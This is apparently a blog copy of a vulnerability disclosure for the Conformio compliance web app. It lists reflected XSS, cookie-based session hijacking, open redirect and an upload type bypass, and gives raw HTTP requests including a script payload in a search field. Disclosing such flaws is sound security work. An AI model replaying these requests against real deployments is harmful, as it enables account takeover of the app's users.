Thursday, 18 July 2019

Conformio-Online Compliance Tool Multiple Vulnerabilities

# Exploit Title: Conformio-Online Compliance Tool Multiple Vulnerabilities.
# Discovered Date: 16/11/2017
# Exploit Author: Ramikan 
# Website:
# Affected Product: Online Compliance Tool- Conformio
# Version: Cloud Based Application
# CVE : N/A
# Category: Web Apps


Vulnerability 1: Reflected Cross Site Scripting

Description: An authenticated user can submit a malicious script into the search field and this value is not validated by the server and it reflects back on the front end to cause XSS.

Affected URL: /web/dataset/call_kw/project.project/search_all

Affected Parameter: search_term



POST /web/dataset/call_kw/project.project/search_all HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 359
Connection: close
Cookie: session_id=b43fb60========================c5bb1====

{"jsonrpc":"2.0","method":"call","params":{"model":"project.project","method":"search_all","args":[{"search_term":"<script>alert(document.cookie)</script>","query_element":"all","related_users":"","projects":"","tags":"","status":"","date_range":"2019-07-11 - 2019-07-18","query_task_element":"","limit":30,"related_users_by":""}],"kwargs":{}},"id":38301}


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Jul 2019 09:16:16 GMT
Content-Type: application/json
Content-Length: 49
Connection: close
Set-Cookie: session_id=b43fb60========================c5bb1=====; Expires=Wed, 16-Oct-2019 09:16:16 GMT; Max-Age=7776000; Path=/
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"jsonrpc": "2.0", "id": 383301, "result": []}


Vulnerability 2: Session Fixation


Description: It is possible to steal the cookie "session_id" using the above XSS attack and obtain the session cookie since there is no secure flag option to protect the cookie.

Affected URL:

Affected Parameter: Cookie: session_id 
Unauthorised account: 
After obtaing the session cookie from the XSS attack, I changed my session id with that, to give me full access to the victims's account.

Vulnerability 3: Open Redirection


Description: It is possible for an unauthenticated user to modify the value of 'redirect'parameter with any domain name and the server redirects the victim after they log in successfully.

Affected URL:

Affected Parameter: redirect


Vulnerability 4: File Upload Missing Control


Description: It is possible for an unthenticated user to modify the file type of the file from .DOCX to any other file type by intercepting the request to the server.

Affected URL: /web/dataset/call_kw/ir.attachment/write

Affected Parameter: name 



POST /web/dataset/call_kw/ir.attachment/write HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 245
Connection: close
Cookie: session_id=241b76b9a9f==========================sdfsd8



HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Jul 2019 15:07:46 GMT
Content-Type: application/json
Content-Length: 51
Connection: close
Set-Cookie: session_id=241b76b9a9f==========================sdfsd8; Expires=Wed, 16-Oct-2019 15:06:16 GMT; Max-Age=7776000; Path=/
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"jsonrpc": "2.0", "id": 514549236, "result": true} 
 Modified Request:

Removed the file extention .docx under the name parameter.


POST /web/dataset/call_kw/ir.attachment/write HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 245
Connection: close
Cookie: session_id=241b76b9a9f==========================sdfsd8



HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Jul 2019 15:07:46 GMT
Content-Type: application/json
Content-Length: 51
Connection: close
Set-Cookie: session_id=241b76b9a9f==========================sdfsd8:46 GMT; Max-Age=7776000; Path=/
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"jsonrpc": "2.0", "id": 514549236, "result": true}

No comments:

Post a Comment

Conformio-Online Compliance Tool Multiple Vulnerabilities

# Exploit Title: Conformio-Online Compliance Tool Multiple Vulnerabilities. # Discovered Date: 16/11/2017 # Exploit Author: Ramikan # Websi...